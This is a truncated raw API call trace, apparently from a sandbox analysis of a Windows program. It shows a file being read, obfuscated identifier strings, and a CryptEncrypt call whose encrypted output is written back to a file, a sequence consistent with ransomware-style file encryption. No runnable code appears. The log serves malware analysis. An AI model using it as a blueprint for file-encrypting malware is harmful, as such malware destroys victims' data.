hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0210.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e5020 [0210.941] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0210.941] ReadFile (in: hFile=0x4dc, lpBuffer=0x37c0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0210.944] ReadFile (in: hFile=0x4dc, lpBuffer=0x37c0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesRead=0x8cf4f8*=0x1480, lpOverlapped=0x0) returned 1 [0210.944] ReadFile (in: hFile=0x4dc, lpBuffer=0x37c0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0210.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0210.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11480) returned 0x2a8a938 [0210.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e5020 | out: hHeap=0x2af0000) returned 1 [0210.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0210.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0210.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11480) returned 0x2aae878 [0210.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a938 | out: hHeap=0x2af0000) returned 1 [0210.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.992] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0210.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11480) returned 0x2a8a938 [0210.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a938 | out: hHeap=0x2af0000) returned 1 [0210.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.993] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0210.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0210.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0210.993] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0210.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0210.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.993] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0210.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0210.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a38 [0210.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0210.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11480) returned 0x2a8a938 [0210.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b48 [0210.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a18 [0210.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ac8 [0210.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0210.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa768 [0210.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0210.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0210.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0210.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11480) returned 0x2abfd00 [0210.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0210.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0210.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0210.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0210.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0210.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0210.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0210.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0210.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0210.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0210.997] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0210.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0210.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0210.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0210.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0210.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0210.998] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0210.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0210.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0210.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0210.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0210.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0210.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0210.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0210.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0210.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0210.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0210.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0210.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0210.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0210.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0210.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0210.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0210.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0210.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0210.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0210.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0211.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0211.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0211.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0211.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0211.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0211.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0211.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0211.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0211.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0211.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0211.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0211.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0211.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0211.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.000] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0211.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0211.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.001] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0211.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0211.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0211.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0211.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0211.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0211.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0211.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0211.001] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0211.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0211.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0211.001] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0211.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0211.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0211.001] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.001] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.001] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.001] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.002] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0211.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0211.003] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x11480, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x11488) returned 1 [0211.003] CharLowerBuffW (in: lpsz="byte[70792]", cchLength=0xb | out: lpsz="byte[70792]") returned 0xb [0211.005] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.005] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.005] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0211.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab380, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0211.005] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d0050*, pdwDataLen=0x8cef60*=0x11480, dwBufLen=0x11488 | out: pbData=0x37d0050*, pdwDataLen=0x8cef60*=0x11488) returned 1 [0211.008] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.008] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.008] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.008] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.008] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.008] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.015] WriteFile (in: hFile=0x520, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0x11488, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0x11488, lpOverlapped=0x0) returned 1 [0211.018] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0211.019] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0211.019] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.019] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.019] CharLowerBuffW (in: lpsz="bool", 